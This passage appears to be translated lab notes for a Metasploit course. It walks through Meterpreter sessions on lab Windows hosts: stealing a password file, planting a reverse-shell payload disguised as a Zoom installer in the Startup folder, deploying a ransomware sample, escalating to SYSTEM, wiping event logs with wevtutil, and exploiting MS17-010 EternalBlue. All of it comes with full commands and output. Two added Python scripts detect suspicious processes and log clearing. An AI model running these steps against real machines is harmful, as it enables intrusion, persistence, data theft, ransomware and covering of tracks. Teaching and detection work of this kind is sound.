1704 2240 notepad.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\notepad.exe
1720 496 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1776 632 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
1840 496 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2116 2516 jucheck.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
2132 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
2140 496 taskhost.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\taskhost.exe
2212 868 dwm.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\Dwm.exe
2240 2188 explorer.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\Explorer.EXE
2396 2240 vmtoolsd.exe x64 1 MSDN-SPECIAL\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2516 2412 jusched.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
2616 2356 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
2624 2356 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
2640 800 audiodg.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\AUDIODG.EXE
2780 2240 ZoomInstallerFull.exe x64 1 MSDN-SPECIAL\Administrator C:\Users\Administrator\Desktop\ZoomInstallerFull.exe
- Terminate 'notepad.exe', which is running on the target (Windows 7).
meterpreter > kill 1704
Killing: 1704
meterpreter > ps
~ (output omitted) ~
- Check on the target (Windows 7) that Notepad has closed.
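The listings above also show why the session had to be moved out of ZoomInstallerFull.exe in step 5: it is the only process whose image runs from a user profile path, which is exactly what a responder looks for first. As an added example that is not part of the original notes, the script below parses a Meterpreter `ps` listing, flags processes running from user-writable locations and prints their parent chain. The sample listing is a constructed subset of the one above.

```python
"""Triage a Meterpreter `ps` listing for binaries running from user-writable paths (added example)."""
import re

# Constructed sample, cut down from the `ps` listing above (Meterpreter's column order).
SAMPLE_PS = r"""
Process List
============

PID   PPID  Name                   Arch  Session  User                        Path
---   ----  ----                   ----  -------  ----                        ----
0     0     [System Process]
4     0     System                 x64   0
220   4     smss.exe               x64   0        NT AUTHORITY\SYSTEM         \SystemRoot\System32\smss.exe
496   396   services.exe           x64   0        NT AUTHORITY\SYSTEM         C:\Windows\system32\services.exe
1400  496   vmtoolsd.exe           x64   0        NT AUTHORITY\SYSTEM         C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1704  2240  notepad.exe            x64   1        MSDN-SPECIAL\Administrator  C:\Windows\system32\notepad.exe
2240  2188  explorer.exe           x64   1        MSDN-SPECIAL\Administrator  C:\Windows\Explorer.EXE
2780  2240  ZoomInstallerFull.exe  x64   1        MSDN-SPECIAL\Administrator  C:\Users\Administrator\Desktop\ZoomInstallerFull.exe
"""

# One ps row. User may contain spaces, so it is matched lazily up to a path that
# starts with a drive letter or \SystemRoot. Rows without Arch/Session/User/Path still parse.
LINE_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>\S.*?)\s+(?P<path>(?:[A-Za-z]:|\\SystemRoot)\\.*?))?)?\s*$"
)

# Locations a normal user can write to; a binary executing from here deserves a look.
USER_WRITABLE_RE = re.compile(
    r"^[A-Za-z]:\\(Users|ProgramData|Temp)\\|\\AppData\\|\\Temp\\", re.IGNORECASE
)


def parse_ps(text):
    """Return {pid: row}; headers, rulers and the bracketed [System Process] row are skipped."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid = int(m["pid"])
        procs[pid] = {
            "pid": pid, "ppid": int(m["ppid"]), "name": m["name"], "arch": m["arch"],
            "session": int(m["session"]) if m["session"] else None,
            "user": m["user"], "path": m["path"],
        }
    return procs


def flag_user_writable(procs):
    """Processes whose image path lies in a user-writable location, lowest PID first."""
    return [p for p in sorted(procs.values(), key=lambda p: p["pid"])
            if p["path"] and USER_WRITABLE_RE.search(p["path"])]


def ancestry(procs, pid):
    """Names from the process up through its parents, as far as the listing allows."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for p in flag_user_writable(procs):
        print(f"{p['pid']:>5}  {p['user']}  {p['path']}")
        print("       parent chain:", " <- ".join(ancestry(procs, p["pid"])))
```

On the sample the only hit is PID 2780, ZoomInstallerFull.exe under C:\Users\Administrator\Desktop, with parent chain ZoomInstallerFull.exe <- explorer.exe (the chain stops at 2188 because that PID is not in the listing). After a successful migrate into explorer.exe the rule finds nothing, which is the point of step 5.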
11) Using a shell prompt on the target (Windows 7)
- 'shell' spawns cmd.exe as a new process and attaches it as a channel, so any CLI command can be run on the target; 'exit' returns to the Meterpreter prompt.
meterpreter > shell
Process 1948 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd ..
cd ..
C:\Windows>cd ..
cd ..
C:\>exit
exit
meterpreter >
12) Rebooting the target (Windows 7)
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
13) Shutting down the target (Windows 7)
meterpreter > shutdown
Shutting down...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
14) Download/upload and file deletion
- On the target (Windows 7), create a 'password.txt' file on the desktop with Notepad and put some text in it.
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter >
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 4.00 B of 4.00 B (100.0%): password.txt -> password.txt
[*] download : password.txt -> password.txt
- In another terminal on Kali, check that 'password.txt' was downloaded (it lands in the directory msfconsole was started from, here /root).
root@kali:~# ls -l password.txt
-rw-r--r-- 1 root root 4 5월 22 14:43 password.txt
root@kali:~#
root@kali:~# cat password.txt
1234
- Upload Kali's '/etc/issue' file to the target's (Windows 7) desktop.
meterpreter > upload /etc/issue
[*] uploading : /etc/issue -> issue
[*] uploaded : /etc/issue -> issue
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 29 fil 2022-05-22 14:47:45 +0900 issue
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
- Check on the target (Windows 7) that the 'issue' file appeared on the desktop.
- Delete the 'issue' file from the target's (Windows 7) desktop.
meterpreter > rm issue
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2575 fil 2019-08-13 13:18:18 +0900 Microsoft Office Excel 2007.lnk
100666/rw-rw-rw- 2581 fil 2019-08-13 13:18:18 +0900 Microsoft Office Word 2007.lnk
100666/rw-rw-rw- 1208 fil 2019-08-08 13:56:15 +0900 SecureCRT.lnk
100777/rwxrwxrwx 24576 fil 2022-05-22 12:18:52 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 282 fil 2019-08-08 10:15:08 +0900 desktop.ini
100666/rw-rw-rw- 4 fil 2022-05-22 14:43:17 +0900 password.txt
40777/rwxrwxrwx 4096 dir 2019-08-08 11:12:06 +0900 설치 파일
- Check on the target (Windows 7) that the 'issue' file is gone from the desktop.
14. Uploading the reverse_tcp payload (Startup folder persistence)
1) Change to the Windows Startup folder
- Anything in the per-user Startup folder runs at every logon of that user, with that user's privileges; it is a well-known persistence location and one of the first places autorun tools check. Backslashes have to be doubled on the Meterpreter command line.
meterpreter > cd C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"Start Menu"\\Programs\\Startup
meterpreter > pwd
C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
meterpreter > dir
Listing: C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
2) Upload the reverse_tcp payload (ZoomInstallerFull.exe) to the Startup folder
meterpreter > upload /root/payloads/ZoomInstallerFull.exe
[*] uploading : /root/payloads/ZoomInstallerFull.exe -> ZoomInstallerFull.exe
[*] uploaded : /root/payloads/ZoomInstallerFull.exe -> ZoomInstallerFull.exe
meterpreter > dir
Listing: C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
- On the target (Windows 7): Start -> All Programs -> Startup -> check that 'ZoomInstallerFull.exe' is listed
- Or browse to C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup and check
3) Confirm that 'ZoomInstallerFull.exe' in the Startup folder runs automatically
① On Kali, exit Metasploit.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
root@kali:~#
② Reboot the target (Windows 7)
③ On Kali, run the 'reverse.rc' handler script
root@kali:~# msfconsole -q -r reverse.rc
~ (output omitted) ~
④ Log in on the target (Windows 7)
⑤ On Kali, confirm the reverse_tcp connection (the payload runs at logon, so the session opens only once the user has logged in)
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49160) at 2022-05-22 15:07:06 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49160 (192.168.20.202)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
15. Uploading ransomware
1) Change to the Windows Startup folder
meterpreter > cd C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"Start Menu"\\Programs\\Startup
meterpreter > pwd
C:\Users\Administrator\Appdata\Roaming\microsoft\windows\start menu\programs\startup
meterpreter > dir
Listing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
2) Upload the ransomware sample (wanna_smile.exe) to the Startup folder
meterpreter > upload /root/Ransomware/wanna_smile.exe
[*] uploading : /root/Ransomware/wanna_smile.exe -> wanna_smile.exe
[*] uploaded : /root/Ransomware/wanna_smile.exe -> wanna_smile.exe
meterpreter >
meterpreter > dir
Listing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
=============================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2022-05-22 15:01:26 +0900 ZoomInstallerFull.exe
100666/rw-rw-rw- 174 fil 2019-08-08 10:15:08 +0900 desktop.ini
100777/rwxrwxrwx 120320 fil 2022-05-22 15:19:44 +0900 wanna_smile.exe
- On the target (Windows 7): Start -> All Programs -> Startup -> check that 'wanna_smile.exe' is listed
- Or browse to C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup and check
3) Confirm that 'wanna_smile.exe' in the Startup folder runs automatically
① On Kali, exit Metasploit.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
root@kali:~#
② Reboot the target (Windows 7)
③ On Kali, run the 'reverse.rc' handler script
root@kali:~# msfconsole -q -r reverse.rc
~ (output omitted) ~
④ Log in on the target (Windows 7)
⑤ On Kali, confirm the reverse_tcp connection
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49160) at 2022-05-22 15:24:41 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49160 (192.168.20.202)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
⑥ On the target (Windows 7), confirm that 'wanna_smile.exe' ran automatically
~ (output omitted) ~
0 I need bitconin
1 I need bitconin
2 I need bitconin
3 I need bitconin
4 I need bitconin
.
.
.
- Computer -> search box (top right) -> search for *.smile -> check the encrypted files
⑦ Recovering the encrypted files on the target (Windows 7)
- Desktop -> '설치 파일' folder -> '랜섬웨어 복호화' (ransomware decryption) -> run 'wanna_dec.exe'
- Computer -> search box (top right) -> search for *.smile -> check that the encrypted files are gone (a few log files are left as they are)
- Before moving on to the next section, do the following:
Exit Metasploit on Kali
Delete the uploaded 'ZoomInstallerFull.exe' and 'wanna_smile.exe' from the target's (Windows 7) Startup folder
Ex) Build and deliver a malicious 'KakaoTalk_Setup.exe' payload
- Repeat sections 10 to 15.
- Skip step 13-5) (process migration).
16. Clearing the system logs on Windows 2008
1) On Kali, run the 'reverse.rc' script
root@kali:~# msfconsole -q -r reverse.rc
[*] Processing reverse.rc for ERB directives.
resource (reverse.rc)> use exploit/multi/handler
resource (reverse.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reverse.rc)> set lhost 192.168.20.50
lhost => 192.168.20.50
resource (reverse.rc)> set lport 4444
lport => 4444
resource (reverse.rc)> set exitsession false
exitsession => false
resource (reverse.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.20.50:4444
2) View the event logs on the target (Windows 2008)
- Windows key -> Search programs and files -> click 'Event Viewer'
- Or Win+R -> run 'eventvwr.msc'
3) Log file location on the target (Windows 2008)
- C:\Windows\System32\winevt\Logs
Application.evtx
Security.evtx
Setup.evtx
System.evtx
[Reference] Linux log directories
/var/log
/etc/httpd/logs
/var/log/apache2
4) On the target (Windows 2008), run the reverse_tcp payload 'ZoomInstallerFull.exe'.
5) On Kali, check that a Meterpreter session has opened, then escalate to SYSTEM with getsystem (technique 1 creates a named pipe and impersonates the SYSTEM service that connects to it).
[*] Sending stage (205891 bytes) to 192.168.20.201
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.201:49180) at 2022-05-22 15:46:03 +0900
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN2008\Administrator @ WIN2008 192.168.20.50:4444 -> 192.168.20.201:49180 (192.168.20.201)
msf exploit(multi/handler) >
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN2008
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
6) Clearing the logs on the target (Windows 2008)
- 'wevtutil cl <log>' empties the named log; run it from the SYSTEM shell obtained above.
meterpreter > shell
Process 1984 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>wevtutil cl "application"
wevtutil cl "application"
C:\Windows\system32>wevtutil cl "security"
wevtutil cl "security"
C:\Windows\system32>wevtutil cl "setup"
wevtutil cl "setup"
C:\Windows\system32>wevtutil cl "system"
wevtutil cl "system"
C:\Windows\system32>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.201 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) > exit
root@kali:~#
7) Confirm the logs were cleared on the target (Windows 2008)
- Event Viewer -> F5 (refresh) -> check that the logs are empty
- Clearing is itself logged: the Security log immediately receives event ID 1102 ("The audit log was cleared") and the System log receives event ID 104 for each other log that was cleared, both recording the account that did it. Events already forwarded to a collector or SIEM are unaffected, so this only blinds the local host.
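From the defender's side the four wevtutil calls above leave a distinctive trace: one 1102 in Security and three 104s in System, all within seconds and all attributed to the same account. The following is an added example, not part of the original notes, that finds that pattern in exported event records. The records are constructed to mirror what the clears above would leave behind, in a collector-style dict form whose field names follow the events' XML (SubjectUserName, SubjectDomainName, and for 104 the cleared Channel); two ordinary events are included so the filter has something to ignore.

```python
"""Detect event-log clearing (IDs 1102/104) in exported Windows event records (added example)."""
from datetime import datetime

PROVIDER = "Microsoft-Windows-Eventlog"
# (channel the record lands in, event ID) written when a log is cleared:
# 1102 in Security for the Security log, 104 in System for every other log.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}

# Constructed records: the four clears from above plus two unrelated events.
SAMPLE_EVENTS = [
    {"Channel": "System", "EventID": 104, "Provider": PROVIDER, "TimeCreated": "2022-05-22T06:52:10+00:00",
     "UserData": {"SubjectUserName": "Administrator", "SubjectDomainName": "WIN2008", "Channel": "Application"}},
    {"Channel": "Security", "EventID": 1102, "Provider": PROVIDER, "TimeCreated": "2022-05-22T06:52:11+00:00",
     "UserData": {"SubjectUserName": "Administrator", "SubjectDomainName": "WIN2008"}},
    {"Channel": "System", "EventID": 104, "Provider": PROVIDER, "TimeCreated": "2022-05-22T06:52:12+00:00",
     "UserData": {"SubjectUserName": "Administrator", "SubjectDomainName": "WIN2008", "Channel": "Setup"}},
    {"Channel": "System", "EventID": 104, "Provider": PROVIDER, "TimeCreated": "2022-05-22T06:52:13+00:00",
     "UserData": {"SubjectUserName": "Administrator", "SubjectDomainName": "WIN2008", "Channel": "System"}},
    {"Channel": "System", "EventID": 7036, "Provider": "Service Control Manager",
     "TimeCreated": "2022-05-22T06:55:00+00:00", "UserData": {}},
    {"Channel": "Security", "EventID": 4624, "Provider": "Microsoft-Windows-Security-Auditing",
     "TimeCreated": "2022-05-22T07:10:00+00:00", "UserData": {}},
]


def find_log_clears(events):
    """One hit per cleared log: when it happened, which log, and which account did it."""
    hits = []
    for ev in events:
        if ev["Provider"] != PROVIDER or (ev["Channel"], ev["EventID"]) not in CLEAR_EVENTS:
            continue
        ud = ev.get("UserData", {})
        hits.append({
            "when": ev["TimeCreated"],
            # 1102 always means the Security log; 104 names the cleared channel in its data.
            "cleared": "Security" if ev["EventID"] == 1102 else ud.get("Channel", "?"),
            "by": f"{ud.get('SubjectDomainName', '?')}\\{ud.get('SubjectUserName', '?')}",
        })
    return hits


def group_bursts(hits, window_s=60):
    """Group clears that follow each other within window_s seconds.

    Several logs wiped back to back is the wevtutil-in-a-row pattern above; a
    single clear weeks apart is more likely an admin housekeeping action.
    """
    groups = []
    for h in sorted(hits, key=lambda h: h["when"]):
        t = datetime.fromisoformat(h["when"])
        if groups and (t - groups[-1]["end"]).total_seconds() <= window_s:
            groups[-1]["cleared"].append(h["cleared"])
            groups[-1]["end"] = t
        else:
            groups.append({"start": t, "end": t, "by": h["by"], "cleared": [h["cleared"]]})
    return groups


if __name__ == "__main__":
    for g in group_bursts(find_log_clears(SAMPLE_EVENTS)):
        print(f"{g['start']:%Y-%m-%d %H:%M:%S} {g['by']} cleared: {', '.join(g['cleared'])}")
```

On the sample this reports a single burst in which WIN2008\Administrator cleared Application, Security, Setup and System within four seconds; the 7036 and 4624 records are ignored.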
17. reverse_tcp attack via the 'SMB' vulnerability
- MS17-010 (EternalBlue): a flaw in the SMBv1 server that allows unauthenticated remote code execution in the kernel over TCP 445; the injected code runs as SYSTEM, so it yields a backdoor with full privileges without any credentials.
- Reference: https://www.exploit-db.com/exploits/42315
1) Scanning for the SMB vulnerability with 'smb_ms17_010'
- The scanner module only inspects the server's response to a crafted SMBv1 transaction and does not trigger the bug, so it is safe to run across a whole subnet.
root@kali:~# msfconsole -q
msf >
msf > search smb_ms17_010
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true yes Check for architecture on vulnerable hosts
CHECK_DOPU true yes Check for DOUBLEPULSAR on vulnerable hosts
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/smb/smb_ms17_010) > set threads 16
threads => 16
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
[-] 192.168.20.1:445 - Host does NOT appear vulnerable.
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 54 of 256 hosts (21% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[+] 192.168.20.201:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.20.204:445 - Host does NOT appear vulnerable.
[+] 192.168.20.202:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > back
msf >
2) Attacking the target (Windows 7) with 'ms17_010_eternalblue'
- The exploit corrupts the kernel's non-paged pool; the module is ranked 'average' because a failed attempt can crash the target (BSOD) rather than fail cleanly. With the default payload it returns a command shell; the payload is injected into spoolsv.exe (ProcessName option), which runs as SYSTEM.
msf > search ms17_010_eternalblue
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.20.202
rhost => 192.168.20.202
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] 192.168.20.202:445 - Connecting to target for exploitation.
[+] 192.168.20.202:445 - Connection established for exploitation.
[+] 192.168.20.202:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.202:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.20.202:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.20.202:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.20.202:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.20.202:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.202:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.202:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.202:445 - Starting non-paged pool grooming
[+] 192.168.20.202:445 - Sending SMBv2 buffers
[+] 192.168.20.202:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.202:445 - Sending final SMBv2 buffers.
[*] 192.168.20.202:445 - Sending last fragment of exploit packet!
[*] 192.168.20.202:445 - Receiving response from exploit packet
[+] 192.168.20.202:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.202:445 - Sending egg to corrupted connection.
[*] 192.168.20.202:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49161) at 2022-05-22 16:33:27 +0900
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
(Ctrl+C)
Abort session 1? [y/N] y
[*] 192.168.20.202 - Command shell session 1 closed. Reason: User exit
3) Switching the payload to 'meterpreter/reverse_tcp'
msf exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
~ (output omitted) ~
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.20.202 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
